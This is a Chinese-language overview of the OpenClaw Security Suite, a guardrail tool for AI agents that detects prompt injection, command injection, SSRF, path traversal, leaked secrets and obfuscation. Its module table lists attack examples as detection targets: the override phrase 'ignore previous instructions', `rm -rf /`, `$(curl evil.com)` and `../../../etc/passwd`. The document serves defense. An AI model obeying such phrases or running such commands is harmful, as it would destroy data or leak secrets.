核心功能
OpenClaw Security Suite 是专为 AI Agent 设计的综合安全防护系统,采用6个并行检测模块实现实时威胁防护:
| 模块 | 防护对象 | 典型攻击场景 |
|------|---------|------------|
| Prompt Injection Detector | 提示注入 | "忽略先前指令"、角色劫持、越狱尝试 |
| Command Validator | 命令注入 | `rm -rf /`、`$(curl evil.com)`、管道链攻击 |
| URL Validator | SSRF | 内网 IP、云元数据端点、`file:///` 协议 |
| Path Validator | 路径遍历 | `../../../etc/passwd`、空字节注入、Windows UNC |
| Secret Detector | 密钥泄露 | OpenAI/AWS/GitHub API 密钥、SSH 私钥、数据库凭证 |
| Content Scanner | 混淆检测 | Base64/Hex 编码、Unicode 混淆、同形异义字符 |
显著优点
1. 极致性能:并行架构实现 20-50ms 验证延迟,异步数据库写入不阻塞主流程
2. 智能分级:5 级敏感度(paranoid→permissive)+ 5 级响应动作(allow→block_notify),支持按模块覆盖配置
3. 透明集成:通过 user-prompt-submit-hook 和 tool-call-hook 自动拦截,无需改动业务代码
4. 完整可观测:内置 SQLite 数据库记录安全事件、用户信誉评分、攻击模式分析
潜在局限
- 规则依赖:基于正则/模式匹配,可能产生误报(可通过敏感度调节缓解)
- 正则性能:Secret Detector 模块在大文本扫描时 CPU 占用较高
- 本地化不足:云元数据端点检测主要针对 AWS/Azure/GCP,私有化部署需自定义规则
- 无行为分析:缺乏基于 ML 的异常行为检测,对新型攻击变种识别能力有限
适用人群
- AI Agent 开发者:需为 Claude/GPT 等 Agent 增加安全护栏
- 企业安全团队:需要审计追踪、用户信誉管理和合规报告
- SaaS 平台运营:多租户场景下的输入验证和速率限制
使用建议
生产环境建议从 medium 敏感度起步,启用所有模块,通过 /openclaw-sec events 定期审查 HIGH 级别事件,逐步调优至 strict。开发测试阶段可使用 openclaw-sec test 验证配置有效性。
---
系统架构支持 1000+ 次验证/分钟,内存占用 <50MB,数据库默认保留 365 天事件记录。